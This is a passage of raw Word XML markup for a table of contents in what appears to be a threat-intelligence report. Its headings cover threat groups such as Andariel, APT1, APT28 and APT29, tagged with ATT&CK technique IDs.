        </w:p>
        <w:p w14:paraId="7DFD0305" w14:textId="530A9C54" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480840" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Andariel</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480840 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E69DCDC" w14:textId="3925FA96" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480841" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.3.1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_Toc153480841 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E4AE279" w14:textId="6846D9D0" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480842" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.3.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - Lazarus APT conceals malicious code within BMP image to drop its RAT</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480842 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49DF3437" w14:textId="2A6FEBE1" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480843" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.4</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT 1</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480843 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12E3105A" w14:textId="1CCEC026" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480844" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.4.1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_Toc153480844 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BF71587" w14:textId="39ABDCAD" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480845" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.4.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001, T1566.002 - APT1: Exposing One of China's Cyber Espionage Units</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480845 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4101A4CC" w14:textId="5500F79F" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480846" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.5</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT 28</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480846 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="771C0E42" w14:textId="4E5BF38E" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480847" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.5.1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_Toc153480847 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A5BE640" w14:textId="0E06C93F" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480848" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.5.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1133, T1078.004, T1190 - Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480848 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="029CEADD" w14:textId="50EFA7C0" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480849" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.5.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.002 – INDICTMENT - The Grand Jury for the District of Columbia charges</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480849 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58EAC9F2" w14:textId="07F51AB2" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480850" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.5.4</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.002 – INDICTMENT - The Grand Jury for the District of Columbia charges</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480850 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42522275" w14:textId="3277FD5A" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480851" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.5.5</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1078 - INDICTMENT - The Grand Jury for the District of Columbia charges</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480851 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6400AF4E" w14:textId="62CC122E" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480852" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.6</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT 29</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480852 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09522426" w14:textId="56094C49" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
